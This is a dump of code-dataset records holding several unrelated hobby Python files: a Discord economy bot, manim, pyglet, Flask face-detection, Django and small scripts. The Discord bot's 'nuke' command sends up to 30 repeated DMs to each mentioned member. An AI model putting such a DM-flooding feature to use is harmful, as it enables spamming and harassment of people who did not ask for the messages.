isinstance(error, commands.BadArgument):\n await ctx.send('You did the command wrong.')\n logger.warning(f'AUTHOR: {ctx.message.author} | METHOD: tip | ERROR: {error}')\n\n\n\n\n@bot.command(name='leaderboard', aliases=['lb'])\nasync def leaderboard(ctx):\n '''\n See the coffee bean top leaderboard.\n '''\n coffee_cog = bot.get_cog('CoffeeCog')\n users = get_users(user_data)\n await ctx.message.delete()\n \n lb = coffee_cog.get_lb(users)\n \n embed = discord.Embed(color=discord.Color.orange())\n embed.title = ':coffee: *Coffee Bean Leaderboards* :coffee:'\n desc = ''\n for i, (name, beans) in enumerate(lb):\n if i < 12 and i != 0: # really shitty code here but whatever\n desc += f'{i}. **{name}** - *{beans} beans*\\n'\n #embed.add_field(name=f'{i+1}. {name} - {beans} beans', value=f' ', inline=False)\n embed.description = desc\n await ctx.send(embed=embed)\n logger.info(f'{ctx.message.author} requested to see the leaderboard in {ctx.channel.name}')\n\n@bot.command(name='lossboard', aliases=['Lb'])\nasync def lossboard(ctx):\n '''\n See who has lost the most gambling.\n '''\n coffee_cog = bot.get_cog('CoffeeCog')\n users = get_users(user_data)\n await ctx.message.delete()\n \n lb = coffee_cog.get_lossboard(users)\n \n embed = discord.Embed(color=discord.Color.red())\n embed.title = ':coffee: *Coffee Bean Lossboards* :coffee:'\n desc = ''\n for i, (name, net_loss) in enumerate(lb):\n if i < 10:\n desc += f'{i+1}. **{name}**: *{net_loss} beans*\\n'\n #embed.add_field(name=f'{i+1}. {name} - {beans} beans', value=f' ', inline=False)\n embed.description = desc\n await ctx.send(embed=embed)\n logger.info(f'{ctx.message.author} requested to see the lossboard in {ctx.channel.name}')\n\n\n\n\n@bot.command(name='shop')\nasync def shop(ctx):\n '''\n The coffee shop.\n '''\n await ctx.message.delete()\n\n embed = discord.Embed(color=discord.Color.teal())\n embed.title = ':coffee: *Coffee Shop* :coffee:'\n embed.set_thumbnail(url=ctx.guild.icon_url)\n\n items = [\n ('Change nickname', '--changenick |\\n 50 coffee beans'),\n ('Nuke someone', '--nuke |\\n 300 coffee beans'),\n ('Become a regular!', '--regular |\\n 1000 coffee beans'),\n ('Become a caffeine addict!', '--caffeineaddict |\\n 7500 coffee beans'),\n ('Order your own drink!', '--order |\\n 25,000 coffee beans'),\n ('Become a pumpkin spice latte!', '--pumpkinspice |\\n 40,000 coffee beans')\n ]\n\n for name, value in items:\n embed.add_field(name=name, value=value, inline=True)\n\n await ctx.send(embed=embed)\n logger.info(f'{ctx.message.author} requested to see the shop in {ctx.channel.name}')\n\n\n\n@bot.command(name='changenick', aliases=['cn'])\nasync def changenick(ctx, nickname):\n '''\n Change your nickname for 50 beans.\n --changenick \n '''\n cost = 50\n user = ctx.message.author\n\n coffee_cog = bot.get_cog('CoffeeCog')\n users = get_users(user_data)\n \n if str(user.id) not in users:\n logger.warning(f'{user} is NOT in JSON file but is trying to change nickname.')\n \n if coffee_cog.get_beans(users, user) >= cost:\n await user.edit(nick=nickname)\n await coffee_cog.add_beans(users, user, -1*cost)\n await ctx.send(f'Success {user.mention}!')\n else:\n ctx.send(f'You do not have enough beans; you need {count}.')\n\n save_users(user_data, users)\n@changenick.error\nasync def changenick_error(ctx, error):\n logger.warning(f'AUTHOR: {ctx.message.author} | METHOD: changenick | ERROR: {error}')\n\n\n\nasync def buy_role(ctx, cost, rolename):\n '''\n Helper function for roles.\n '''\n user = ctx.message.author\n coffee_cog = bot.get_cog('CoffeeCog')\n users = get_users(user_data)\n \n if str(user.id) not in users:\n logger.warning(f'{user} is NOT in JSON file but is trying to buy the Regular role.')\n\n if coffee_cog.get_beans(users, user) >= cost:\n if not rolename in [roles.name for roles in user.roles]:\n role = get(user.guild.roles, name=rolename)\n await user.add_roles(role)\n\n await coffee_cog.add_beans(users, user, -1*cost)\n beans = coffee_cog.get_beans(users, user)\n await ctx.send(f'Congrats! You are now a {rolename}. You now have {beans} coffee beans.')\n logger.info(f'{user} bought the {rolename} role.')\n else:\n await ctx.send(f'You already are a {rolename}.')\n else:\n await ctx.send(f'You do not have enough beans; you need {cost}.')\n\n save_users(user_data, users)\n\n@bot.command(name='regular')\nasync def regular(ctx):\n '''\n Obtain the 'Regular' role in exchange for 1000 beans.\n '''\n cost = 1000\n rolename = 'Regular'\n\n await buy_role(ctx, cost, rolename)\n@regular.error\nasync def regular_error(ctx, error):\n logger.warning(f'AUTHOR: {ctx.message.author} | METHOD: regular | ERROR: {error}')\n\n@bot.command(name='caffeineaddict')\nasync def caffeineaddict(ctx):\n '''\n Obtain the 'Caffeine Addict' role in exchange for 7500 beans.\n '''\n cost = 7500\n rolename = 'Caffeine Addict'\n\n await buy_role(ctx, cost, rolename)\n@caffeineaddict.error\nasync def caffeineaddict_error(ctx, error):\n logger.warning(f'AUTHOR: {ctx.message.author} | METHOD: caffeineaddict | ERROR: {error}')\n\n@bot.command(name='pumpkinspice')\nasync def pumpkinspice(ctx):\n '''\n Obtain the 'Pumpkin Spice Latte' role in exchange for 40,000 beans.\n '''\n cost = 40000\n rolename = 'Pumpkin Spice Latte'\n\n await buy_role(ctx, cost, rolename)\n@pumpkinspice.error\nasync def pumpkinspice_error(ctx, error):\n logger.warning(f'AUTHOR: {ctx.message.author} | METHOD: pumpkinspice | ERROR: {error}')\n\n@bot.command(name='order')\nasync def order(ctx, drink_name: str, color:str):\n '''\n Buy a drink of your choice (obtain the role) for 25,000 beans.\n --order \"drink name\" \n '''\n guild = ctx.guild\n user = ctx.message.author\n coffee_cog = bot.get_cog('CoffeeCog')\n users = get_users(user_data)\n cost = 25000\n position = 11\n beans = coffee_cog.get_beans(users, user)\n unorderable = ['Pumpkin Spice Latte', 'Brewmaster']\n\n if '#' in color:\n color = color.replace('#', '')\n col = discord.Color(value=int(color, 16))\n\n if str(user.id) not in users:\n logger.warning(f'{user} is NOT in JSON file but is trying to buy a role.')\n\n if drink_name in unorderable:\n await ctx.send('You cannot order this drink.')\n return\n \n if drink_name.lower() in [roles.name.lower() for roles in user.roles]:\n await ctx.send(f'You are already a {drink_name}.')\n return\n\n if beans >= cost:\n await coffee_cog.add_beans(users, user, -1*cost)\n # check if role already exists, if not then create it\n if get(user.guild.roles, name=drink_name) is None:\n try:\n await guild.create_role(name=drink_name, hoist=True, color=col)\n except Exception as e:\n print(e)\n\n role = get(user.guild.roles, name=drink_name)\n await role.edit(position=position)\n await user.add_roles(role)\n await ctx.send(f'Congrats! You are now a {drink_name}.')\n logger.info(f'{user} bought the {drink_name} role.')\n\n else:\n await ctx.send(f'You do not have enough beans; you need {cost}.')\n\n save_users(user_data, users)\n@order.error\nasync def order_error(ctx, error):\n logger.warning(f'AUTHOR: {ctx.message.author} | METHOD: order | ERROR: {error}')\n \n\n\n@bot.command(name='migrate')\n@commands.has_any_role('Brewmaster')\nasync def migrate(ctx):\n coffee_cog = bot.get_cog('CoffeeCog')\n users = get_users(user_data)\n\n logger.info(f'{ctx.message.author} MIGRATED.')\n await ctx.send('Migrating...')\n\n for member in ctx.guild.members:\n if not member == bot.user:\n await coffee_cog.update_data(users, member)\n await coffee_cog.migrate_user(users, member)\n \n save_users(user_data, users)\n await ctx.send('Done!')\n\n\n\n@tasks.loop(seconds=30.0)\nasync def loop_beans():\n '''\n Every 30 seconds gives everyone in vc 1 bean.\n '''\n coffee_cog = bot.get_cog('CoffeeCog')\n users = get_users(user_data)\n\n for guild in bot.guilds:\n if guild.name == GUILD:\n server = guild\n break\n members = server.members\n for member in members:\n if member.voice and member != bot.user:\n await coffee_cog.update_data(users, member)\n await coffee_cog.add_beans(users, member, 1)\n\n roll = random.randint(1, 10001)\n if roll == 69:\n await member.send('You found a golden coffee bean!')\n await coffee_cog.add_beans(users, member, 10000)\n\n save_users(user_data, users)\n\n\n\n@bot.command(name='clear')\n@commands.has_any_role('Brewmaster', 'Pumpkin Spice Latte')\nasync def clear(ctx, amount=10):\n await ctx.channel.purge(limit=amount)\n logger.info(f'{ctx.message.author} cleared {ctx.channel.name}.')\n\n\n\n@bot.command(name='nuke')\n@commands.has_any_role('Brewmaster', 'Regular', 'Caffeine Addict')\nasync def nuke(ctx, nuke_count: int, *targets):\n '''\n Sends specified number of nuke dms to target(s) for 300 credits.\n Must be 'Brewmaster' or 'Regular' to use this command.\n '''\n user = ctx.message.author\n coffee_cog = bot.get_cog('CoffeeCog')\n users = get_users(user_data)\n\n cost = 300\n NUKE_LIMIT = 30\n allowed_channels = ['robo-waiter', 'the-room-where-it-happens']\n\n if nuke_count < 0:\n return\n\n if coffee_cog.get_beans(users, user) < cost:\n await ctx.send('You are too poor to nuke.')\n return\n \n await coffee_cog.update_data(users, user)\n await coffee_cog.add_beans(users, user, -1*cost)\n\n if ctx.channel.name in allowed_channels:\n nuke_amount = NUKE_LIMIT if nuke_count > NUKE_LIMIT else nuke_count\n if ctx.message.mentions:\n await ctx.send(':rotating_light: NUKE INITIATED :rotating_light:')\n for target_member in ctx.message.mentions:\n for i in range(nuke_amount):\n await target_member.send(f':bomb: YOU HAVE BEEN NUKED BY {user}!!! :bomb:')\n logger.info(f'{user} nuked {target_member} {nuke_amount} times from channel: {ctx.channel.name}.')\n else:\n await ctx.send('No targets specified.')\n logger.info(f'{user} tried to nuke with no targets in: {ctx.channel.name} and failed.')\n else:\n await ctx.send('You do not have access to the launch system.')\n logger.info(f'{user} tried to nuke in an invalid channel: {ctx.channel.name} and failed.')\n save_users(user_data, users)\n@nuke.error\nasync def nuke_error(ctx, error):\n if isinstance(error, commands.BadArgument):\n await ctx.send('Invalid launch code.')\n if isinstance(error, commands.CommandInvokeError):\n await ctx.send('ERROR: Sorry, your nukes do not reach that far.')\n if isinstance(error, commands.MissingAnyRole):\n await ctx.send('I\\'m afraid you do not have access to nukes. Sincere apologies.')\n logger.warning(f'AUTHOR: {ctx.message.author} | METHOD: nuke | ERROR: {error}')\n\n\n\"\"\"\n@bot.command(name='hbd')\nasync def hbd(ctx, nuke_count: int, *targets):\n '''\n Sends specified number of nuke dms to target(s) for 300 credits.\n Must be 'Brewmaster' or 'Regular' to use this command.\n '''\n user = ctx.message.author\n coffee_cog = bot.get_cog('CoffeeCog')\n users = get_users(user_data)\n\n cost = 0\n NUKE_LIMIT = 100\n allowed_channels = ['robo-waiter', 'the-room-where-it-happens']\n\n if nuke_count < 0:\n return\n\n if coffee_cog.get_beans(users, user) < cost:\n await ctx.send('You are too poor to nuke.')\n return\n \n await coffee_cog.update_data(users, user)\n await coffee_cog.add_beans(users, user, -1*cost)\n\n if ctx.channel.name in allowed_channels:\n nuke_amount = NUKE_LIMIT if nuke_count > NUKE_LIMIT else nuke_count\n if ctx.message.mentions:\n await ctx.send(':rotating_light: BIRTHDAY NUKE INITIATED :rotating_light:')\n for target_member in ctx.message.mentions:\n for i in range(nuke_amount):\n await target_member.send(f':birthday: YOU HAVE :candle: BEEN :stars: WISHED :sparkles: A VERY HAPPY BIRTHDAY :sparkler: BY :sparkling_heart: {user} :birthday:')\n await target_member.send(f':birthday: AGAIN, YOU :stars: HAVE :candle: BEEN :sparkles: WISHED A VERY :sparkler: HAPPY :sparkling_heart: BIRTHDAY BY {user} :birthday:')\n logger.info(f'{user} nuked {target_member} {nuke_amount} times from channel: {ctx.channel.name}.')\n else:\n await ctx.send('No targets specified.')\n logger.info(f'{user} tried to nuke with no targets in: {ctx.channel.name} and failed.')\n else:\n await ctx.send('You do not have access to the launch system.')\n logger.info(f'{user} tried to nuke in an invalid channel: {ctx.channel.name} and failed.')\n save_users(user_data, users)\n@hbd.error\nasync def hbd_error(ctx, error):\n if isinstance(error, commands.BadArgument):\n await ctx.send('Invalid launch code.')\n if isinstance(error, commands.CommandInvokeError):\n await ctx.send('ERROR: Sorry, your nukes do not reach that far.')\n logger.warning(f'AUTHOR: {ctx.message.author} | METHOD: hbd | ERROR: {error}')\n\"\"\"\n\n\n\n\n\n\n\n####################################################################\n#=======================NON COFFEE STUFF HERE=======================\n####################################################################\n\n@bot.command(name='dopamine')\nasync def dopamine(ctx):\n '''\n Get a hit of dopamine, with help from Robo.\n '''\n await asyncio.sleep(random.randint(5, 10))\n await ctx.send(f'{ctx.message.author.mention} <3')\n\n\n@bot.command(name='8ball')\nasync def eball(ctx):\n '''\n Get a yes or no from Robo Waiter.\n '''\n responses = ['Most certainly.', 'Most definitely not.']\n await ctx.message.delete()\n await ctx.send(random.choice(responses))\n@eball.error\nasync def eball_error(ctx, error):\n logger.warning(f'AUTHOR: {ctx.message.author} | METHOD: rng | ERROR: {error}')\n\n@bot.command(name='rng')\nasync def rng(ctx, start: int, end: int):\n '''\n Generates a random integer in interval [start, end].\n '''\n embed = discord.Embed()\n embed.title = 'Your Random Number'\n embed.description = random.randint(start, end)\n await ctx.send(embed=embed)\n@rng.error\nasync def rng_error(ctx, error):\n logger.warning(f'AUTHOR: {ctx.message.author} | METHOD: rng | ERROR: {error}')\n\n@bot.command(name='bday')\n@commands.has_any_role('Brewmaster')\nasync def bday(ctx):\n '''\n Plays the happy birthday song.\n '''\n video = 'happy birthday'\n music_cog = bot.get_cog('MusicCog')\n await music_cog.join(ctx)\n await music_cog.play(ctx, query=video)\n\n\n@bot.command(name='quote')\nasync def quote(ctx, quote_type):\n '''\n Outputs a random quote of specified type.\n Great for when you're bored or feeling experimental.\n Options include: 'funny', 'motivational'\n '''\n quote_types = ['funny', 'motivational']\n if quote_type in quote_types:\n with open(f'quotes/{quote_type}_quotes.txt', 'r', encoding='utf8') as f:\n quotes = f.readlines()\n random_int = random.randint(0,len(quotes)-1)\n\n if quote_type == 'funny':\n if random_int % 2 == 1:\n random_int -= 1\n q = f'{quotes[random_int]}{quotes[random_int+1]}'\n elif quote_type == 'motivational':\n q = f'{quotes[random_int]}'\n\n await ctx.send(q)\n logger.info(f'{ctx.message.author} requested a {quote_type} quote in {ctx.channel.name}.')\n else:\n await ctx.send(f'My apologies. I couldn\\'t find a \"{quote_type}\" quote.')\n@quote.error\nasync def quote_error(ctx, error):\n logger.warning(f'AUTHOR: {ctx.message.author} | METHOD: quote | ERROR: {error}')\n\n\n\n@bot.command(name='setmood', aliases=['mood'])\nasync def setmood(ctx, mood):\n '''\n Outputs a scenic setting exposition followed by joining vc and playing matching soundscape.\n Perfect for sleeping or studying.\n Join a voice channel for the full effect.\n Options include: 'fall', 'nature', 'rain', 'summer', 'jazz', 'synthwave'\n '''\n moods = ['fall', 'nature', 'rain', 'summer', 'jazz', 'synthwave']\n member = ctx.message.author\n \n if mood in moods:\n with open(f'mood/{mood}/moods.txt','r', encoding='utf8') as f:\n scenes = f.readlines()\n random_int = random.randint(0,len(scenes)-1)\n \n embed = discord.Embed()\n embed.description = f'*{scenes[random_int][:-1]}*'\n\n await ctx.send(embed=embed)\n logger.info(f'{ctx.message.author} set mood to: {mood} in {ctx.channel.name}.')\n\n if member and member.voice:\n with open(f'mood/{mood}/urls.txt','r', encoding='utf8') as f:\n urls = f.readlines()\n video = urls[random_int].rstrip()\n music_cog = bot.get_cog('MusicCog')\n await music_cog.join(ctx)\n logger.info(f'Robo Waiter joined or is in: {member.voice.channel}.')\n await music_cog.play(ctx, query=video)\n logger.info(f'{ctx.message.author} added {video} to the queue.')\n else:\n await ctx.send('Join a voice channel for the full effect.')\n else:\n await ctx.send(f'Mood \"{mood}\" not found.')\n@setmood.error\nasync def setmood_error(ctx, error):\n if isinstance(error, commands.BadArgument):\n await ctx.send('I could not find that mood.')\n logger.warning(f'AUTHOR: {ctx.message.author} | METHOD: setmood | ERROR: {error}')\n\n\n\n@bot.command(name='ustoopid')\nasync def ustoopid(ctx):\n '''\n A cleaner way to point out another's intelligence or lack thereof.\n '''\n await ctx.message.delete()\n await ctx.send('Not quite the sharpest tool in the shed I see.')\n\n@bot.command(name='yep')\nasync def yep(ctx):\n '''\n When you need Robo Waiter to confirm.\n '''\n choices = ['Indubitably.', 'Certainly.', 'Indeed.', 'Undoubtedly.', 'Assuredly.']\n await ctx.message.delete()\n await ctx.send(random.choice(choices))\n\n@bot.command(name='helpme')\nasync def helpme(ctx):\n '''\n Sends a helpful link when someone calls for help.\n '''\n embed = discord.Embed(color=discord.Color.green())\n embed.title = 'Somebody call for help?'\n embed.description = '[Try this helpful link.](https://www.youtube.com/watch?v=dQw4w9WgXcQ)'\n await ctx.send(embed=embed)\n@helpme.error\nasync def helpme_error(ctx, error):\n logger.warning(f'AUTHOR: {ctx.message.author} | METHOD: helpme | ERROR: {error}')\n\n\n\n@bot.command(name='sendmelody', aliases=['sm'])\nasync def sendmelody(ctx, target):\n '''\n Send a nice melody somebody's way if they're in a voice channel.\n '''\n if target and len(ctx.message.mentions) == 1:\n member = ctx.message.mentions[0]\n if member.voice:\n music_cog = bot.get_cog('MusicCog')\n await music_cog.join_member(ctx, member)\n logger.info(f'Robo Waiter joined or is in: {member.voice.channel}.')\n await music_cog.play(ctx, query='Replay [Official Music Video] - Iyaz')\n logger.info(f'{ctx.message.author} queued SHAWTYS LIKE A MELODY for {member}.')\n else :\n await ctx.send('Unfortunately, your target is not in a voice channel.')\n@sendmelody.error\nasync def sendmelody_error(ctx, error):\n if isinstance(error, commands.MissingRequiredArgument):\n await ctx.send('You must specify a target.')\n if isinstance(error, commands.BadArgument):\n await ctx.send('I\\'m sorry, but your target is invalid.')\n logger.warning(f'AUTHOR: {ctx.message.author} | METHOD: sendmelody | ERROR: {error}')\n\n\nif __name__ == '__main__':\n bot.run(TOKEN)\n","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":29369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"123472685","text":"from __future__ import annotations\n\nimport re\nfrom functools import lru_cache\n\nfrom typing import TYPE_CHECKING\nif TYPE_CHECKING:\n from typing import List, Tuple\n\n\n@lru_cache(maxsize=1)\ndef get_pattern_symbol_count_pairs() -> List[Tuple[str, int]]:\n from manimlib.utils.tex_to_symbol_count import TEX_TO_SYMBOL_COUNT\n\n # Gather all keys of previous map, grouped by common value\n count_to_tex_list = dict()\n for command, num in TEX_TO_SYMBOL_COUNT.items():\n if num not in count_to_tex_list:\n count_to_tex_list[num] = []\n count_to_tex_list[num].append(command)\n\n # Create a list associating each count with a regular expression\n # that will find any tex commands matching that list\n pattern_symbol_count_pairs = list()\n\n # Account for patterns like \\begin{align} and \\phantom{thing}\n # which, together with the bracketed content account for zero paths.\n # Deliberately put this first in the list\n tex_list = [\"begin\", \"end\", \"phantom\"]\n pattern_symbol_count_pairs.append(\n (\"|\".join(r\"\\\\\" + s + r\"\\{[^\\\\}]+\\}\" for s in tex_list), 0)\n )\n\n for count, tex_list in count_to_tex_list.items():\n pattern = \"|\".join(r\"\\\\\" + s + r\"(\\s|\\\\)\" + s for s in tex_list)\n pattern_symbol_count_pairs.append((pattern, count))\n\n # Assume all other expressions of the form \\thing are drawn with one path\n # Deliberately put this last in the list\n pattern_symbol_count_pairs.append((r\"\\\\[a-zA-Z]+\", 1))\n\n return pattern_symbol_count_pairs\n\n\ndef num_tex_symbols(tex: str) -> int:\n \"\"\"\n This function attempts to estimate the number of symbols that\n a given string of tex would produce.\n \"\"\"\n total = 0\n for pattern, count in get_pattern_symbol_count_pairs():\n total += count * len(re.findall(pattern, tex))\n tex = re.sub(pattern, \" \", tex) # Remove that pattern\n\n # Count remaining characters\n total += sum(map(lambda c: c not in \"^{} \\n\\t_$\", tex))\n return total\n","sub_path":"manimlib/utils/tex.py","file_name":"tex.py","file_ext":"py","file_size_in_byte":1984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"561383721","text":"import pyglet\nimport config\n\nIMAGES = {\"ground\" : pyglet.image.load(config.ART_FOLDER + \"ground.png\"),\n \"tail\" : pyglet.image.load(config.ART_FOLDER + \"tail.png\"),\n \"head\" : pyglet.image.load(config.ART_FOLDER + \"head.png\"),\n \"fire\" : pyglet.image.load(config.ART_FOLDER + \"fire.png\"),\n \"player\" : pyglet.image.load(config.ART_FOLDER + \"player.png\")}\nTILES = {\"fire\" : pyglet.image.ImageGrid(IMAGES[\"fire\"], 1, 4)}\nFRAMES = {\"fire\" : (pyglet.image.AnimationFrame(TILES[\"fire\"][0], 0.10),\n pyglet.image.AnimationFrame(TILES[\"fire\"][1], 0.10),\n pyglet.image.AnimationFrame(TILES[\"fire\"][2], 0.10),\n pyglet.image.AnimationFrame(TILES[\"fire\"][3], 0.10))}\nANIMATIONS = {\"fire\" : pyglet.image.Animation(FRAMES[\"fire\"])}\n\nclass Ground(pyglet.sprite.Sprite):\n def __init__(self, map_x, map_y):\n self.map_x = map_x\n self.map_y = map_y\n super(Ground, self).__init__(IMAGES[\"ground\"], 0, 0)\n\nclass Tail(pyglet.sprite.Sprite):\n def __init__(self, map_x, map_y):\n self.map_x = map_x\n self.map_y = map_y\n super(Tail, self).__init__(IMAGES[\"tail\"], 0, 0)\n\nclass Head(pyglet.sprite.Sprite):\n def __init__(self, map_x, map_y):\n self.map_x = map_x\n self.map_y = map_y\n super(Head, self).__init__(IMAGES[\"head\"], 0, 0)\n\nclass Fire(pyglet.sprite.Sprite):\n def __init__(self, map_x, map_y):\n self.map_x = map_x\n self.map_y = map_y\n super(Fire, self).__init__(ANIMATIONS[\"fire\"], 0, 0)\n\nclass Player(pyglet.sprite.Sprite):\n def __init__(self, map_x, map_y):\n self.map_x = map_x\n self.map_y = map_y\n super(Player, self).__init__(IMAGES[\"player\"], 0, 0)\n","sub_path":"tile.py","file_name":"tile.py","file_ext":"py","file_size_in_byte":1743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"389633010","text":"import numpy as np\nimport cv2\nimport pkg_resources\nimport socket\nfrom flask import Flask, request, redirect\nfrom flask_cors import CORS\n\nhaar_xml = pkg_resources.resource_filename(\n 'cv2', 'data/haarcascade_frontalface_default.xml')\nface_cascade = cv2.CascadeClassifier(haar_xml)\n\napp = Flask(__name__)\nCORS(app)\n\n@app.route('/', methods=['GET', 'POST'])\ndef upload_file():\n if request.method == 'POST':\n if 'file' not in request.files:\n return redirect(request.url)\n file = request.files['file']\n img = np.asarray(bytearray(request.files['file'].read()), dtype=\"uint8\")\n img = cv2.imdecode(img, cv2.IMREAD_COLOR)\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n faces = face_cascade.detectMultiScale(gray, 1.3, 5)\n backendaddr = socket.gethostbyname(socket.gethostname())\n\n return {\"faces\":[x.tolist() for x in faces],\n \"backendaddr\":backendaddr}\n\n return '''\n \n Backend\n

Backend, send POST with file

\n '''\n\nif __name__ == \"__main__\":\n app.secret_key = 'super secret key'\n app.config['SESSION_TYPE'] = 'filesystem'\n app.run(port=5001,host='0.0.0.0')\n","sub_path":"application/facedetect/src/backend/backend.py","file_name":"backend.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"633673541","text":"# -*- coding: utf-8 -*-\n\n\ndef main():\n t = int(input())\n for case in range(1, t + 1):\n k, c, s = [int(x) for x in input().split()]\n if c * s < k:\n print('Case #{}: {}'.format(case, 'IMPOSSIBLE'))\n continue\n n = 0\n ret = ['Case #{}:'.format(case)]\n for i in range(k):\n n = n * k + i\n if (i + 1 == k) or (i % c == c - 1):\n ret.append(str(n + 1))\n n = 0\n print(' '.join(ret))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"qualification_round_2016/D.py","file_name":"D.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"154403023","text":"import numpy as np\nimport struct\nimport time\nfrom math import *\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nimport ipdb\n\ndef plot_data(_fpga, _channels):\n global data, fpga, channels, bw\n fpga = _fpga; channels = _channels\n bw = 67 #trunc(fpga.est_brd_clk()/2.)\n fig = plt.figure()\n ax1 = fig.add_subplot(211)\n ax2 = fig.add_subplot(223)\n ax3 = fig.add_subplot(224)\n \"\"\"ax1.set_title('Relative angle [rad]')\n ax1.set_xlabel('frequency?')\n ax1.set_ylabel('$\\phi$[rad]')\n ax2.set_title('Power ZDOK0 [dB]')\n ax2.set_xlabel('frequency')\n ax2.set_ylabel('[dB]')\n ax3.set_title('Power ZDOK1 [dB]')\n ax3.set_xlabel('frequency')\n ax3.set_ylabel('[dB]')\n ax1.set_xlim(0,bw)\n ax1.set_ylim(-10, 10)\n ax2.set_xlim(0,bw)\n ax2.set_ylim(-10, 10)\n ax3.set_xlim(0,bw)\n ax3.set_ylim(-10, 10)\n ax1.grid()\n ax2.grid()\n ax3.grid()\"\"\"\n angle, = ax1.plot([], [], lw=2)\n powA, = ax2.plot([], [], lw=2)\n powB, = ax3.plot([], [], lw=2)\n data = [angle, powA, powB]\n #ipdb.set_trace()\n anim = animation.FuncAnimation(fig, animate, init_func=init, frames=200, interval=200, blit=True)\n plt.plot()\n\n\ndef init():\n data[0].set_data([],[])\n data[1].set_data([],[])\n data[2].set_data([],[])\n print(data)\n return data\n\ndef read_data():\n \"\"\"Read and parse the values of the brams of the roach\"\"\"\n \"\"\"Esto esta hecho para leer 64 bits en los brams... hay que modificar el modelo\"\"\"\n global fpga\n #A2 = struct.unpack('>16384Q', fpga.read('A2', 16384*8,0)) #me parece que es struct.unpack('>16384', fpga.read('A2', 16384*8,0))\n #B2 = struct.unpack('>16384Q', fpga.read('B2', 16384*8,0))\n #AB_re = struct.unpack('>16384Q', fpga.read('AB_re', 16384*8, 0))\n #AB_im = struct.unpack('>16384Q', fpga.read('AB_im', 16384*8, 0))\n A2 = np.random.rand(1, 16384)\n B2 = np.random.rand(1, 16384)\n AB_re = np.random.rand(1, 16384)\n AB_im = np.random.rand(1, 16384)\n log_a = 10*np.log10(A2)\n log_b = 10*np.log10(B2)\n ang = np.arctan2(AB_im, AB_re)\n return [ang, log_a, log_b]\n\n\ndef animate(i):\n global bw, channels\n print('animate')\n values_read = read_data()\n freq = np.linspace(0, bw, channels, endpoint=False)\n data[0].set_data(freq, values_read[0])\n data[1].set_data(freq, values_read[1])\n data[2].set_data(freq, values_read[2])\n print('animate')\n print(data)\n return data\n","sub_path":"prueba.py","file_name":"prueba.py","file_ext":"py","file_size_in_byte":2448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"97859647","text":"\"\"\" \"Legend of ponomar\" - a rpg\nCopyright (C) 2015 Alex Ponomarev\n\nЭто свободная программа; вы можете повторно распространять ее и/или\nмодифицировать ее в соответствии с Универсальной Общественной Лицензией\nGNU, опубликованной Фондом Свободного ПО; либо версии 2, либо (по вашему\nвыбору) любой более поздней версии.\n\nЭта программа распространяется в надежде, что она будет полезной, но БЕЗ\nКАКИХ-ЛИБО ГАРАНТИЙ; даже без подразумеваемых гарантий КОММЕРЧЕСКОЙ\nЦЕННОСТИ или ПРИГОДНОСТИ ДЛЯ КОНКРЕТНОЙ ЦЕЛИ. Для получения подробных\nсведений смотрите Универсальную Общественную Лицензию GNU.\n\nВы должны были получить копию Универсальной Общественной Лицензии GNU\nвместе с этой программой; если нет, напишите в Free Software Foundation,\nInc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA\"\"\"\n\nclass mob:\n health = 100\n \n \n\nclass sword:\n damage = None\n health = None\n image = None \n itype = 'sword'\n name = None\n \n def __init__(self, damage, health, image, name):\n self.damage = damage\n self.health = health\n self.image = image\n self.name = name\n \nclass heal:\n heal = None\n image = None\n itype = 'heal'\n \n def __init__(self, heal, image):\n self.heal = heal \n self.image = image\n\nclass helmet:\n armory = None\n name = None\n itype = \"helmet\"\n image = None\n health = None\n \n def __init__(self, armor, health, image, name):\n self.armory = armor\n self.name = name\n self.image = image\n self.health = health\n \ndef lvl(const):\n if const == 1:\n \n f_r = open('./levels/level_1.txt', 'r')\n lvl1 = [list(line) for line in f_r]\n \n f_r.close()\n \n loot = [[17, 5, sword(20, 50, 0, \"usual sword\")],\n [17, 19, heal(50, 1)]]\n \n return lvl1, 5, 12, loot, (-1, -1), (18, 12), 2, 0\n elif const == 2:\n \n f_r = open('./levels/level_2.txt', 'r')\n lvl2 = []\n \n for i in range(25):\n lvl2.append(list(f_r.readline()))\n \n f_r.close() \n return lvl2, 5, 12, [], (4, 12), (11, 20), 6, 7\n elif const == 3:\n \n f_r = open('./levels/level_3.txt', 'r')\n lvl3 = []\n \n for i in range(25):\n lvl3.append(list(f_r.readline()))\n \n f_r.close() \n \n loot = [[5, 19, helmet(10, 100, 2, \"usual helmet\")]]\n \n return lvl3, 6, 5, loot, (6, 4), (6, 20), 9, 10 \n\n","sub_path":"level.py","file_name":"level.py","file_ext":"py","file_size_in_byte":3112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"370690714","text":"from django.conf.urls import patterns, include, url\n\n# Uncomment the next two lines to enable the admin:\n# from django.contrib import admin\n# admin.autodiscover()\n\nurlpatterns = patterns('',\n # Examples:\n # url(r'^$', 'thesite.views.home', name='home'),\n # url(r'^thesite/', include('thesite.foo.urls')),\n\n # Uncomment the admin/doc line below to enable admin documentation:\n # url(r'^admin/doc/', include('django.contrib.admindocs.urls')),\n\n # Uncomment the next line to enable the admin:\n # url(r'^admin/', include(admin.site.urls)),\n url(r'^$', 'bootstrap.views.index',name='Home'),\n url(r'^product$', 'bootstrap.views.product',name='Product'),\n url(r'^services$', 'bootstrap.views.services',name='Services'),\n url(r'^contact$', 'bootstrap.views.about',name='Contact'),\n url(r'^about$', 'bootstrap.views.about',name='About'),\n ## django auth\n url(r'^accounts/login/$', 'django.contrib.auth.views.login',name='Login'),\n url(r'^accounts/logout/$', 